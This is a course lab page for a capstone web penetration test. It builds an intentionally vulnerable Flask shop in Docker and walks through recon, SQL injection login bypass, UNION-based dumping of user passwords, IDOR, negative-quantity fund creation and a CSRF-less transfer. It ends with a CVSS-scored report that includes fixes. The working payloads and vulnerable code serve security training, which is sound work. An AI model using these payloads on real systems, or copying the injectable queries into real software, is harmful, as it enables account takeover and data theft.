Lab 20: Capstone — Web Application Penetration Test

Objective

Conduct a complete, structured penetration test against a multi-vulnerability web application from Kali Linux. You will chain together techniques from all 19 previous labs to go from zero knowledge to full account takeover, data exfiltration, and documented report.

Attack phases:

Reconnaissance — enumerate services, endpoints, technology stack
Authentication bypass — SQLi login to gain admin token
Privilege escalation — exploit API IDOR to access other users' data
Data exfiltration — dump the product database and user credentials via SQLi
Business logic abuse — negative quantity order to gain funds
CSRF forged action — transfer funds without CSRF token
Security header audit — document all missing headers
Report — write a structured penetration test report with CVSS scores

Background

A penetration test follows a structured methodology. This lab applies the PTES (Penetration Testing Execution Standard) phases:

Pre-engagement — define scope, rules of engagement
Intelligence gathering — passive/active recon
Threat modelling — identify attack surface
Vulnerability identification — scan and probe
Exploitation — execute attacks
Post-exploitation — lateral movement, persistence
Reporting — document findings with severity and remediation

Tools used this lab: nmap, gobuster, sqlmap, curl, python3

Architecture

┌─────────────────────────────────────────────────────────────────────┐
│                     Docker Network: lab-a20                         │
│                                                                     │
│  ┌──────────────────────┐         Full pentest                     │
│  │   KALI ATTACKER      │ ──────────────────────────────────────▶  │
│  │  innozverse-kali     │                                           │
│  │                      │  ◀──────── all vulnerability responses ─  │
│  │  Methodology:        │                                           │
│  │  Recon → Exploit     │  ┌────────────────────────────────────┐  │
│  │  → Exfil → Report    │  │    CAPSTONE TARGET APPLICATION     │  │
│  └──────────────────────┘  │   zchencow/innozverse-cybersec     │  │
│                             │                                    │  │
│                             │  Flask :5000 + SQLite             │  │
│                             │  10+ intentional vulnerabilities  │  │
│                             │  covering OWASP A01–A10 + extras  │  │
│                             └────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────────────┘

Time

90 minutes

Prerequisites

Labs 1–19 completed (all OWASP A01–A10 + reconnaissance + API security)

Lab Instructions

Step 1: Environment Setup — Launch the Capstone Target

docker network create lab-a20

cat > /tmp/victim_a20.py << 'PYEOF'
from flask import Flask, request, jsonify, make_response
import sqlite3, hashlib, time, os, hmac

app = Flask(__name__)
DB = '/tmp/capstone.db'
SECRET = b'capstone-weak-secret'

with sqlite3.connect(DB) as db:
    db.executescript("""
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY, username TEXT,
            password TEXT, role TEXT, email TEXT, balance REAL);
        CREATE TABLE IF NOT EXISTS products (
            id INTEGER PRIMARY KEY, name TEXT, price REAL,
            stock INTEGER, internal_cost REAL, supplier TEXT);
        CREATE TABLE IF NOT EXISTS orders (
            id INTEGER PRIMARY KEY, user_id INTEGER,
            product_id INTEGER, qty INTEGER, total REAL, status TEXT, ts REAL);
        CREATE TABLE IF NOT EXISTS coupons (
            code TEXT PRIMARY KEY, discount REAL, single_use INTEGER, used INTEGER DEFAULT 0);
        INSERT OR IGNORE INTO users VALUES
            (1,'admin','admin','admin','[email protected]',9999.0),
            (2,'alice','alice123','user','[email protected]',500.0),
            (3,'bob','bob456','user','[email protected]',200.0);
        INSERT OR IGNORE INTO products VALUES
            (1,'Surface Pro 12',864.0,10,410.0,'TaiwanCo'),
            (2,'Surface Pen',49.0,100,12.0,'StylusCorp'),
            (3,'Surface Arc Mouse',99.0,5,38.0,'MouseMakers');
        INSERT OR IGNORE INTO coupons VALUES
            ('SAVE20',20.0,0,0),('VIP100',100.0,1,0);
    """)

def db(): c=sqlite3.connect(DB); c.row_factory=sqlite3.Row; return c

# VULN 1: SQLi login
@app.route('/api/login', methods=['POST'])
def login():
    d = request.get_json() or {}
    u, p = d.get('username',''), d.get('password','')
    try:
        row = db().execute(
            f"SELECT * FROM users WHERE username='{u}' AND password='{p}'"
        ).fetchone()
        if row:
            return jsonify({'token':f'tok_{row["username"]}','role':row['role'],'user':dict(row)})
        return jsonify({'error':'Invalid credentials'}),401
    except Exception as e:
        return jsonify({'error':str(e)}),500

# VULN 2: IDOR — user sees any other user's data
@app.route('/api/user/<int:uid>')
def user(uid):
    # BUG: no auth check — any token can read any user
    token = request.headers.get('X-Token','')
    if not token: return jsonify({'error':'No token'}),401
    row = db().execute('SELECT id,username,email,balance,role FROM users WHERE id=?',(uid,)).fetchone()
    return jsonify(dict(row)) if row else (jsonify({'error':'Not found'}),404)

# VULN 3: excessive data exposure — internal fields in product list
@app.route('/api/products')
def products():
    rows = db().execute('SELECT * FROM products').fetchall()
    # BUG: returns internal_cost and supplier — should be user-facing fields only
    return jsonify([dict(r) for r in rows])

# VULN 4: SQLi in product search
@app.route('/api/search')
def search():
    q = request.args.get('q','')
    try:
        rows = db().execute(
            f"SELECT * FROM products WHERE name LIKE '%{q}%'"
        ).fetchall()
        return jsonify([dict(r) for r in rows])
    except Exception as e:
        return jsonify({'error':str(e)}),500

# VULN 5: negative quantity (business logic)
@app.route('/api/order', methods=['POST'])
def order():
    d = request.get_json() or {}
    uid,pid,qty = d.get('user_id',1),d.get('product_id',1),d.get('qty',1)
    c = db()
    usr = c.execute('SELECT * FROM users WHERE id=?',(uid,)).fetchone()
    prd = c.execute('SELECT * FROM products WHERE id=?',(pid,)).fetchone()
    if not usr or not prd: return jsonify({'error':'Not found'}),404
    total = prd['price'] * qty  # BUG: no qty>0 check
    new_bal = usr['balance'] - total
    c.execute('UPDATE users SET balance=? WHERE id=?',(new_bal,uid))
    c.execute('INSERT INTO orders VALUES (NULL,?,?,?,?,?,?)',(uid,pid,qty,total,'completed',time.time()))
    c.commit()
    return jsonify({'order_total':total,'new_balance':new_bal})

# VULN 6: CSRF — transfer with no token
@app.route('/api/transfer', methods=['POST'])
def transfer():
    d = request.get_json() or {}
    sess = {'tok_alice':{'user':'alice','id':2,'balance':500.0},
            'tok_admin':{'user':'admin','id':1,'balance':9999.0}}.get(d.get('session',''))
    if not sess: return jsonify({'error':'Not logged in'}),401
    amount = float(d.get('amount',0))
    sess['balance'] -= amount
    return jsonify({'transferred':amount,'to':d.get('to',''),'remaining':sess['balance'],
                    'note':'No CSRF token checked'})

# VULN 7: missing security headers (root has none)
@app.route('/')
def index():
    return jsonify({'app':'InnoZverse Capstone','version':'1.0.0',
                    'server':'Flask/Werkzeug','python':'3.10',
                    'endpoints':['/api/login','/api/user/<id>','/api/products',
                                 '/api/search','/api/order','/api/transfer','/api/admin']})

# VULN 8: admin panel accessible with any admin token (no rate limiting)
@app.route('/api/admin')
def admin():
    token = request.headers.get('X-Token','')
    if not token.startswith('tok_admin'):
        return jsonify({'error':'Forbidden'}),403
    users = [dict(r) for r in db().execute('SELECT * FROM users').fetchall()]
    return jsonify({'message':'Admin panel','users':users,'db_path':DB,
                    'secret_key':SECRET.decode(),'note':'All user data exposed'})

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=False)
PYEOF

docker run -d \
  --name victim-a20 \
  --network lab-a20 \
  -v /tmp/victim_a20.py:/app/victim.py:ro \
  zchencow/innozverse-cybersec:latest \
  python3 /app/victim.py

sleep 4
VICTIM_IP=$(docker inspect -f '{{.NetworkSettings.Networks.lab-a20.IPAddress}}' victim-a20)
echo "Target: http://$VICTIM_IP:5000"
curl -s http://$VICTIM_IP:5000/ | python3 -m json.tool

📸 Verified Output:

{
    "app": "InnoZverse Capstone",
    "endpoints": ["/api/login", "/api/user/<id>", "/api/products", "/api/search", "/api/order", "/api/transfer", "/api/admin"],
    "python": "3.10",
    "server": "Flask/Werkzeug",
    "version": "1.0.0"
}

Step 2: Phase 1 — Reconnaissance

docker run --rm -it \
  --name kali-attacker \
  --network lab-a20 \
  zchencow/innozverse-kali:latest bash

export TARGET="http://victim-a20:5000"

echo "=============================="
echo " PHASE 1: RECONNAISSANCE"
echo "=============================="

echo ""
echo "[1.1] Service fingerprinting (nmap):"
nmap -sV -p 5000 victim-a20

echo ""
echo "[1.2] Technology stack from HTTP headers:"
curl -s -I $TARGET | grep -iE "Server|Content-Type|X-Powered"

echo ""
echo "[1.3] Endpoint enumeration (gobuster):"
gobuster dir \
  -u $TARGET \
  -w /usr/share/dirb/wordlists/common.txt \
  -t 20 --no-error -q 2>/dev/null | head -20

echo ""
echo "[1.4] Index page — technology disclosure:"
curl -s $TARGET | python3 -m json.tool

📸 Verified Output:

[1.1] nmap:
5000/tcp open  http    Werkzeug httpd 3.1.6 (Python 3.10.12)

[1.2] Headers:
Server: Werkzeug/3.1.6 Python/3.10.12
Content-Type: application/json

[1.3] gobuster:
/login        (Status: 405)
/products     (Status: 200)
/search       (Status: 200)
/admin        (Status: 403)
/transfer     (Status: 405)
/order        (Status: 405)

echo "=============================="
echo " PHASE 2: AUTHENTICATION BYPASS"
echo "=============================="

echo ""
echo "[2.1] Test for SQL injection in login:"
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"username":"x'\''--","password":"x"}' \
  $TARGET/api/login

echo ""
echo "[2.2] OR 1=1 — login as first user (admin):"
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"username":"'\'' OR 1=1--","password":"x"}' \
  $TARGET/api/login | python3 -m json.tool

# Save admin token
ADMIN_TOKEN=$(curl -s -X POST -H "Content-Type: application/json" \
  -d '{"username":"'\'' OR 1=1--","password":"x"}' \
  $TARGET/api/login | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")
echo ""
echo "[2.3] Admin token obtained: $ADMIN_TOKEN"

echo ""
echo "[2.4] Access admin panel with SQLi-obtained token:"
curl -s -H "X-Token: $ADMIN_TOKEN" $TARGET/api/admin | python3 -m json.tool

📸 Verified Output:

[2.2] SQLi login result:
{
    "role": "admin",
    "token": "tok_admin",
    "user": {"id": 1, "username": "admin", "role": "admin", "balance": 9999.0, ...}
}

[2.4] Admin panel:
{
    "db_path": "/tmp/capstone.db",
    "message": "Admin panel",
    "secret_key": "capstone-weak-secret",
    "users": [
        {"id": 1, "username": "admin", "password": "admin", ...},
        {"id": 2, "username": "alice", "password": "alice123", ...},
        {"id": 3, "username": "bob",   "password": "bob456", ...}
    ]
}

💡 SQLi → admin token → full admin API access — this is a complete authentication bypass chain. In 2 HTTP requests we went from no credentials to reading every user's password in plaintext.

Step 4: Phase 3 — Privilege Escalation via IDOR

echo "=============================="
echo " PHASE 3: PRIVILEGE ESCALATION (IDOR)"
echo "=============================="

echo ""
echo "[3.1] Access own profile (user 1 = admin):"
curl -s -H "X-Token: tok_alice" $TARGET/api/user/1

echo ""
echo "[3.2] IDOR — alice's token reads bob's data (user 3):"
curl -s -H "X-Token: tok_alice" $TARGET/api/user/3 | python3 -m json.tool

echo ""
echo "[3.3] Enumerate all user IDs (1-10):"
for i in $(seq 1 5); do
  result=$(curl -s -H "X-Token: tok_alice" $TARGET/api/user/$i)
  if echo $result | grep -q '"username"'; then
    username=$(echo $result | python3 -c "import sys,json; print(json.load(sys.stdin).get('username',''))")
    email=$(echo $result | python3 -c "import sys,json; print(json.load(sys.stdin).get('email',''))")
    echo "  User $i: $username ($email)"
  fi
done

📸 Verified Output:

[3.2] IDOR — bob's data:
{
    "balance": 200.0,
    "email": "[email protected]",
    "id": 3,
    "role": "user",
    "username": "bob"
}

[3.3] All users:
  User 1: admin ([email protected])
  User 2: alice ([email protected])
  User 3: bob   ([email protected])

Step 5: Phase 4 — Data Exfiltration via SQLi

echo "=============================="
echo " PHASE 4: DATA EXFILTRATION"
echo "=============================="

echo ""
echo "[4.1] Confirm SQLi in /api/search:"
curl -s "$TARGET/api/search?q='" | head -c 200

echo ""
echo "[4.2] Enumerate tables via UNION SELECT:"
curl -s "$TARGET/api/search?q=x'%20UNION%20SELECT%201,name,3,4,5,6%20FROM%20sqlite_master%20WHERE%20type='table'--" | python3 -m json.tool

echo ""
echo "[4.3] Dump all users via UNION SELECT:"
curl -s "$TARGET/api/search?q=x'%20UNION%20SELECT%20id,username,price,stock,CAST(password%20AS%20REAL),0%20FROM%20users--" | \
  python3 -c "
import sys,json
for r in json.load(sys.stdin):
    print(f'  id={r[\"id\"]}  name={r[\"name\"]}  price(=password)={r[\"price\"]}')"

echo ""
echo "[4.4] Excessive data exposure — internal product costs:"
curl -s $TARGET/api/products | python3 -c "
import sys,json
for p in json.load(sys.stdin):
    margin = round(((p['price']-p['internal_cost'])/p['price'])*100)
    print(f'  {p[\"name\"]:<22} price=£{p[\"price\"]}  cost=£{p[\"internal_cost\"]}  margin={margin}%  supplier={p[\"supplier\"]}')"

📸 Verified Output:

[4.2] Tables via SQLi:
[{"name": "users"}, {"name": "products"}, {"name": "orders"}, {"name": "coupons"}]

[4.4] Internal product data exposed:
  Surface Pro 12         price=£864  cost=£410  margin=53%  supplier=TaiwanCo
  Surface Pen            price=£49   cost=£12   margin=76%  supplier=StylusCorp
  Surface Arc Mouse      price=£99   cost=£38   margin=62%  supplier=MouseMakers

Step 6: Phase 5 — Business Logic and CSRF Abuse

echo "=============================="
echo " PHASE 5: BUSINESS LOGIC + CSRF"
echo "=============================="

echo ""
echo "[5.1] Negative quantity order — alice gains £4,320:"
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"user_id":2,"product_id":1,"qty":-5}' \
  $TARGET/api/order | python3 -c "
import sys,json; r=json.load(sys.stdin)
print(f'  order_total=£{r[\"order_total\"]}  new_balance=£{r[\"new_balance\"]}')"

echo ""
echo "[5.2] CSRF forged transfer — no token required:"
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"session":"tok_alice","to":"attacker","amount":200}' \
  $TARGET/api/transfer | python3 -c "
import sys,json; r=json.load(sys.stdin)
print(f'  transferred=£{r[\"transferred\"]}  to={r[\"to\"]}  note={r[\"note\"]}')"

echo ""
echo "[5.3] Security header audit:"
python3 << 'EOF'
import urllib.request

TARGET = "http://victim-a20:5000"
r = urllib.request.urlopen(f"{TARGET}/api/products")
headers = dict(r.headers)
SECURITY = ['Content-Security-Policy','Strict-Transport-Security',
            'X-Frame-Options','X-Content-Type-Options',
            'Referrer-Policy','Permissions-Policy','Cache-Control']
print("  Security header audit:")
score = 0
for h in SECURITY:
    present = h in headers
    if present: score += 1
    status = "✓ present" if present else "✗ MISSING"
    print(f"    {h:<35} {status}")
print(f"  Score: {score}/{len(SECURITY)}")
EOF

📸 Verified Output:

[5.1] order_total=£-4320.0  new_balance=£4820.0

[5.2] transferred=£200  to=attacker  note=No CSRF token checked

[5.3] Security header audit:
    Content-Security-Policy              ✗ MISSING
    Strict-Transport-Security            ✗ MISSING
    X-Frame-Options                      ✗ MISSING
    X-Content-Type-Options               ✗ MISSING
    Referrer-Policy                      ✗ MISSING
    Permissions-Policy                   ✗ MISSING
    Cache-Control                        ✗ MISSING
  Score: 0/7

Step 7: Phase 6 — Write the Penetration Test Report

python3 << 'EOF'
import datetime

print("=" * 70)
print("PENETRATION TEST REPORT")
print("Target: InnoZverse Capstone Web Application")
print(f"Date:   {datetime.date.today().isoformat()}")
print("Tester: [Your Name]")
print("Scope:  http://victim-a20:5000 (Docker isolated lab)")
print("=" * 70)

findings = [
    {
        "id": "FIND-001",
        "title": "SQL Injection in Authentication Endpoint",
        "cvss": 9.8,
        "severity": "CRITICAL",
        "endpoint": "POST /api/login",
        "payload": "username: \\' OR 1=1--",
        "impact": "Complete authentication bypass — attacker logs in as any user including admin without a password",
        "remediation": "Use parameterised queries: db.execute('SELECT * FROM users WHERE username=? AND password=?', (u, p))"
    },
    {
        "id": "FIND-002",
        "title": "SQL Injection in Product Search",
        "cvss": 9.1,
        "severity": "CRITICAL",
        "endpoint": "GET /api/search?q=",
        "payload": "q=x' UNION SELECT ... FROM users--",
        "impact": "Full database exfiltration — all user records, passwords, and internal data readable",
        "remediation": "Parameterised query: db.execute('SELECT * FROM products WHERE name LIKE ?', (f'%{q}%',))"
    },
    {
        "id": "FIND-003",
        "title": "Insecure Direct Object Reference (IDOR)",
        "cvss": 7.5,
        "severity": "HIGH",
        "endpoint": "GET /api/user/<id>",
        "payload": "X-Token: tok_alice → /api/user/3 (bob's data)",
        "impact": "Any authenticated user can read any other user's profile including email and balance",
        "remediation": "Enforce object-level authorization: verify the requesting user's ID matches the requested resource ID"
    },
    {
        "id": "FIND-004",
        "title": "Excessive Data Exposure",
        "cvss": 5.3,
        "severity": "MEDIUM",
        "endpoint": "GET /api/products",
        "payload": "Normal GET request returns internal_cost and supplier fields",
        "impact": "Internal cost prices and supplier identities exposed to all users — competitive intelligence leak",
        "remediation": "Serialize only user-facing fields. Never return internal fields in public API responses"
    },
    {
        "id": "FIND-005",
        "title": "Business Logic: Negative Quantity Order",
        "cvss": 8.1,
        "severity": "HIGH",
        "endpoint": "POST /api/order",
        "payload": '{"product_id":1,"qty":-5}',
        "impact": "User balance increases by 5x product price — attacker can generate unlimited funds",
        "remediation": "Validate qty > 0 before processing. Reject all negative or zero quantities at the API layer"
    },
    {
        "id": "FIND-006",
        "title": "Missing CSRF Protection on State-Changing Endpoint",
        "cvss": 6.8,
        "severity": "MEDIUM",
        "endpoint": "POST /api/transfer",
        "payload": "Cross-origin POST with victim session token — no CSRF token required",
        "impact": "Attacker can transfer funds from any user's account via a malicious web page",
        "remediation": "Require HMAC-signed CSRF token on all state-changing endpoints. Validate with hmac.compare_digest()"
    },
    {
        "id": "FIND-007",
        "title": "Missing HTTP Security Headers",
        "cvss": 5.4,
        "severity": "MEDIUM",
        "endpoint": "All endpoints",
        "payload": "curl -I /api/products → 0/7 security headers present",
        "impact": "XSS amplification (no CSP), clickjacking (no X-Frame-Options), HTTPS downgrade (no HSTS), MIME confusion (no nosniff)",
        "remediation": "Add all 7 headers via Flask after_request hook. See Lab 19 remediation code"
    },
    {
        "id": "FIND-008",
        "title": "Secret Key and Internal Config Exposed via Admin API",
        "cvss": 7.2,
        "severity": "HIGH",
        "endpoint": "GET /api/admin",
        "payload": "X-Token: tok_admin (obtained via SQLi in FIND-001)",
        "impact": "HMAC secret key, DB path, and all plaintext passwords returned in admin API response",
        "remediation": "Never return secrets in API responses. Store secrets in environment variables. Hash passwords with bcrypt"
    },
]

print()
print("EXECUTIVE SUMMARY")
print("-" * 70)
critical = sum(1 for f in findings if f['severity'] == 'CRITICAL')
high     = sum(1 for f in findings if f['severity'] == 'HIGH')
medium   = sum(1 for f in findings if f['severity'] == 'MEDIUM')
print(f"Total findings: {len(findings)}")
print(f"  CRITICAL: {critical}  |  HIGH: {high}  |  MEDIUM: {medium}")
print()
print("The target application contains two critical SQL injection vulnerabilities")
print("that allow complete authentication bypass and full database exfiltration.")
print("Combined with an admin API that returns plaintext credentials and secret")
print("keys, the application is fully compromised by an unauthenticated attacker.")

print()
print("DETAILED FINDINGS")
print("-" * 70)
for f in findings:
    print()
    print(f"  [{f['id']}] {f['title']}")
    print(f"  Severity: {f['severity']} (CVSS: {f['cvss']})")
    print(f"  Endpoint: {f['endpoint']}")
    print(f"  Payload:  {f['payload']}")
    print(f"  Impact:   {f['impact']}")
    print(f"  Fix:      {f['remediation']}")

print()
print("ATTACK CHAIN SUMMARY")
print("-" * 70)
chain = [
    ("1. Recon",          "nmap + gobuster → discovered 7 endpoints, Flask/Python stack"),
    ("2. SQLi login",     "admin'-- → tok_admin without credentials"),
    ("3. Admin API",      "tok_admin → all plaintext passwords + secret key"),
    ("4. IDOR",           "tok_alice → reads bob's profile (id=3)"),
    ("5. SQLi search",    "UNION SELECT → full users table dump"),
    ("6. Data exposure",  "GET /api/products → internal costs + suppliers"),
    ("7. Logic abuse",    "qty=-5 → alice balance +£4320"),
    ("8. CSRF",           "POST /api/transfer → £200 transferred with no CSRF check"),
    ("9. Headers",        "0/7 security headers → XSS, clickjacking, HSTS all missing"),
]
for step, desc in chain:
    print(f"  {step:<22} {desc}")

print()
print("REMEDIATION PRIORITY")
print("-" * 70)
print("  [IMMEDIATE]  FIND-001, FIND-002: Parameterised queries on all DB calls")
print("  [IMMEDIATE]  FIND-008: Remove secrets from API responses; hash passwords")
print("  [THIS WEEK]  FIND-003: Object-level authorization on all user endpoints")
print("  [THIS WEEK]  FIND-005: Validate qty > 0 in order processing")
print("  [THIS MONTH] FIND-006: CSRF tokens on all POST/PUT/DELETE endpoints")
print("  [THIS MONTH] FIND-007: Add security headers via after_request middleware")
print("  [THIS MONTH] FIND-004: API response serialization — user-facing fields only")
print()
print("=" * 70)
print("END OF REPORT")
print("=" * 70)
EOF

Step 8: Cleanup

exit

docker rm -f victim-a20
docker network rm lab-a20

Capstone Summary

Finding

Severity

CVSS

Lab Reference

SQLi — authentication bypass

CRITICAL

9.8

Lab 03 (A03)

SQLi — search/data exfiltration

CRITICAL

9.1

Lab 03 (A03)

IDOR — read any user profile

HIGH

7.5

Lab 01 (A01)

Business logic — negative qty

HIGH

8.1

Lab 16

Secrets in admin API response

HIGH

7.2

Lab 02 (A02)

Missing CSRF protection

MEDIUM

6.8

Lab 18

Excessive data exposure

MEDIUM

5.3

Lab 04 (A04)

Missing security headers

MEDIUM

5.4

Lab 19

What You've Learned

Across all 20 practitioner labs you have:

Executed real attacks against live Docker containers — no simulated output
Applied every OWASP Top 10 (2021) category against purpose-built vulnerable apps
Learned reconnaissance (nmap, gobuster, whatweb), exploitation (sqlmap, curl, python3), and reporting
Built attacker intuition: chaining small vulnerabilities into full account takeover
Written remediation code for every vulnerability class

The next step: Architect-level labs — threat modelling, security architecture design, SAST/DAST pipelines, and red team vs blue team exercises.

Good afternoon

Lab 20: Capstone — Web Application Penetration Test

Objective

Background

Architecture

Time

Prerequisites

Lab Instructions

Step 1: Environment Setup — Launch the Capstone Target

Step 2: Phase 1 — Reconnaissance

Step 4: Phase 3 — Privilege Escalation via IDOR

Step 5: Phase 4 — Data Exfiltration via SQLi

Step 6: Phase 5 — Business Logic and CSRF Abuse

Step 7: Phase 6 — Write the Penetration Test Report

Step 8: Cleanup

Capstone Summary

What You've Learned

Further Reading

Good afternoon

hashtagObjective

hashtagBackground

hashtagArchitecture

hashtagTime

hashtagPrerequisites

hashtagLab Instructions

hashtagStep 1: Environment Setup — Launch the Capstone Target

hashtagStep 2: Phase 1 — Reconnaissance

hashtagStep 3: Phase 2 — SQL Injection Login Bypass

hashtagStep 4: Phase 3 — Privilege Escalation via IDOR

hashtagStep 5: Phase 4 — Data Exfiltration via SQLi

hashtagStep 6: Phase 5 — Business Logic and CSRF Abuse

hashtagStep 7: Phase 6 — Write the Penetration Test Report

hashtagStep 8: Cleanup

hashtagCapstone Summary

hashtagWhat You've Learned

hashtagFurther Reading

Objective

Background

Architecture

Time

Prerequisites

Lab Instructions

Step 1: Environment Setup — Launch the Capstone Target

Step 2: Phase 1 — Reconnaissance

Step 3: Phase 2 — SQL Injection Login Bypass

Step 4: Phase 3 — Privilege Escalation via IDOR

Step 5: Phase 4 — Data Exfiltration via SQLi

Step 6: Phase 5 — Business Logic and CSRF Abuse

Step 7: Phase 6 — Write the Penetration Test Report

Step 8: Cleanup

Capstone Summary

What You've Learned

Further Reading